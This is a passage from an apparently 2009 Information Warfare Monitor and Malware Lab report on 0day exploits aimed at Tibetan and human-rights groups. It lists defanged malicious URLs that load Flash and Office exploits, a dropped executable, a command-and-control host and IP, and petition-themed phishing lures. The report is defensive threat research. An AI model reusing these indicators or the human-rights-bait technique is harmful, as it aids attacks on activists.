    > Lhamo Tso, who is a refugee in northern India, collected several thousand<br />
    > signatures with the help of the Tibet Post (www.thetibetpost.com).<br />
    ><br />
    > See Lhamo Tso&#8217;s campaign video:<br />
    > http://www.dailymotion.com/relevance/search/Dhondup+Wangchen/video/x9zgcf_petition-pour-la-liberation-de-dhon_news<br />
    ><br />
    > Li Dunyong, a Chinese lawyer hired by the family to defend Wangchen, is<br />
    > meanwhile being denied access to him. Li has allowed to see him only once<br />
    > since the start of the year in April. Like many human rights lawyers in<br />
    > China, he is being harassed by the government, which is threatening to<br />
    > rescind his licence if he does not drop the case.<br />
    > Vincent Brossel<br />
    > Asia-Pacific Desk<br />
    > Reporters Without Borders<br />
    > 33 1 44 83 84 70<br />
    > asia@rsf.org
</p></blockquote>
<p>The second link, hxxp://dump.vicp.cc/groups/articles.asp?n=3, is a malicious link that loads the petition but has another frame (hxxp://dump.vicp.cc/groups/ie.html) that loads a 0day exploit for Adobe Flash.<sup>24</sup></p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc5.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc5-300x66.png" alt="0day.doc5" title="0day.doc5" width="300" height="66" class="aligncenter size-medium wp-image-5283" /></a></p>
<p>This page loads &#8220;xp.swf&#8221; and drops &#8220;zjss.exe&#8221; onto the system, which then attempts to connect to pop.lovenickel.com (66.36.242.59) on port 8080 (nothing is currently listening on port 8080). (This same domain was used in a 2006 0day attack against Japanese word processing software.)<sup>25</sup></p>
<p>Also hosted on this site is another page (hxxp://dump.vicp.cc/cach/news.asp?n=1) that uses http://www.leavingfearbehind.com as the bait. This is the website for the film &#8220;Leaving Fear Behind.&#8221; Dhondup Wangchen is the director of the film.</p>
<p>In addition to loading the legitimate website, this link has another frame (hxxp://dump.vicp.cc/cach/error_01.htm) that loads the Microsoft Office Web Components 0day exploit.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc6.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc6-300x49.png" alt="0day.doc6" title="0day.doc6" width="300" height="49" class="aligncenter size-medium wp-image-5284" /></a></p>
<p>The IP address for dump.vicp.cc is 210.56.60.132, which is assigned to:</p>
<blockquote><p>
netname: SUN-NETWORK<br />
descr: Sun Network (Hong Kong) Limited<br />
descr: Internet Service Provider in Hong Kong<br />
country: HK
</p></blockquote>
<p>Our investigation found that a malicious link also using www.leavingfearbehind.com as bait was posted in the comment section of BoingBoing on a post about the Uighur crisis. </p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc7.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc7-300x45.png" alt="0day.doc7" title="0day.doc7" width="300" height="45" class="aligncenter size-medium wp-image-5285" /></a></p>
<p>In addition to the email released by Reporters Without Borders (RSF), a web page was also set up on the RSF website highlighting the fact that more than 13,000 people had signed a petition to release Dhondup Wangchen. However, the page on the RSF website contained the same link from the malicious email, which included both the legitimate Facebook petition by Students for a Free Tibet and the malicious link to dump.vicp.cc.<sup>26</sup></p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc8.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc8-300x94.png" alt="0day.doc8" title="0day.doc8" width="300" height="94" class="aligncenter size-medium wp-image-5286" /></a></p>
<p>RSF promptly removed the malicious link after being alerted.</p>
<p><strong>Conclusion</strong></p>
<p>Our findings indicate that civil society organizations are compromised and used as vehicles to deliver 0day exploits to others (e.g. via a malicious iframe inserted into a legitimate site). This means that (vulnerable) visitors to the site &#8211; many of whom may be staff and supporters of the specific organization &#8211; are likely to be compromised.</p>
<p>We have noticed that the attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available. While it remains unclear if the attackers were able to acquire these exploits before they became public, the fact that they are able to leverage 0day exploits quickly suggests that the attackers are closely monitoring their operations and have the capacity to adapt when necessary.</p>
<p>The attackers leverage human rights issues as the context for malware distribution in what are commonly called &#8220;social engineering&#8221; attacks. They will often send malicious emails to members, supporters and affiliates of civil society organizations. These emails are contextually relevant to the target organizations and contain a malicious attachment or link to a malicious site. The computer of the recipient will be compromised if he or she opens the attachment or visits the malicious website. </p>
<p>These attacks are effective. While it is difficult to determine the rate of successful exploitation, we often discover compromised computers at civil society organizations. Moreover, some of these social engineering attacks are so successful that civil society organizations continue to propagate malicious links within their communities without realizing it.</p>
<p>However, the questions of the attackers&#8217; intent and of responsibility for the attacks remain murky. One could argue that the attacks are somewhat coincidental. The civil society organizations may just be running vulnerable software that was (automatically) exploited and used, just like any other random target, as a vehicle to propagate malware through the insertion of a malicious iframe. That is, there is no intent to target civil society specifically. Similarly, using a human rights-themed email in a social engineering attack might just be a convenient way to get people&#8217;s attention; it is not about targeting civil society per se, just that human rights is an appealing topic and people might be more easily enticed to click on such a link.</p>
<p>An alternative explanation is that the attackers are intent on targeting civil society and are developing and/or have access to 0day exploits that they actively deploy. There have been consistent reports of attacks against civil society, and we are noticing an increasing level of contextual relevance in these attacks. Malicious emails appear to come from email accounts with legitimate names and contact information that are known to the targets. The text of the emails contains fewer spelling and grammatical errors and exploits legitimate email and petition campaigns. The level of specificity and intentionality exceeds the threshold for a group of attackers that simply wants to infect as many hosts as possible. On the contrary, these attacks may actually limit the total number of hosts but provide the attackers with politically sensitive hosts.</p>
<p>While we have no definitive answers concerning those behind these attacks, the result of using 0day exploits against civil society is that the exploitation rate is high. Moreover, the effect is that the community is being subjected to a form of intimidation and exploitation whether the attacks are intentional or not.</p>
<p><strong>About IWM</strong></p>
<p>The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is a public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto, and The SecDev Group, an operational think tank based in Ottawa (Canada).</p>
<p><strong>About Malware Lab</strong></p>
<p>The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks. </p>
<p><strong>Notes</strong></p>
<p>1 To be clear, these attacks represent the use of malware by a wide variety of attackers and are not specifically linked to one another. They are included together as part of our analysis of the 0day threat that civil society organizations face.</p>
<p>2 http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf</p>
<p>3 http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf</p>
<p>4 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf</p>
<p>5 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf</p>
<p>6 http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network</p>
<p>7 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081210</p>
<p>8 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090219</p>
<p>9 http://isc.sans.org/diary.html?storyid=4177</p>
<p>10 http://www.malwaredomainlist.com/forums/index.php?topic=2564.0</p>
<p>11 http://isc.sans.org/diary.html?storyid=6739&#038;rss</p>
<p>12 http://www.nytimes.com/2008/07/11/world/asia/11china.html?th=&#038;emc=th&#038;pagewanted=all</p>
<p>13 http://www.hrichina.org/public/contents/press?revision_id=147917&#038;item_id=56408</p>
<p>14 http://www.amnesty.org/en/library/asset/ASA17/040/2009/en/9ede45c2-3943-4a5b-b75b-7ef68fb6d787/asa170402009en.html</p>
<p>15 http://www.ifex.org/china/2007/07/23/hackers_block_access_to_human_rights/</p>
<p>16 The FCCC&#8217;s WordPress installation was compromised and malicious iframes were inserted which loaded hxxp://www.nontopworld.com/homepage.htm and hxxp://www.nontopworld.com/mainpage.htm.</p>
<p>17 http://isc.sans.org/diary.html?storyid=6733</p>
<p>18 http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html</p>
<p>19 http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx</p>
<p>20 http://en.wikipedia.org/wiki/Phishing</p>
<p>21 http://wepawet.iseclab.org/view.php?hash=5f227eaf1e27d92a8c23e2daebbe4b2f&#038;type=swf</p>
<p>22 http://domain.oray.cn/#tab=free</p>
<p>23 http://www.tibetoffice.ch/news/circular_oot_geneva_280308.htm</p>
<p>24 http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html</p>
<p>25 http://www.symantec.com/connect/blogs/justsystems-ichitaro-zero-day-used-propogate-trojan-0</p>
<p>26 The same page in the Google cache from a day earlier did not contain the malicious link.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.infowar-monitor.net/2009/10/0day-civil-society-and-cyber-security/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

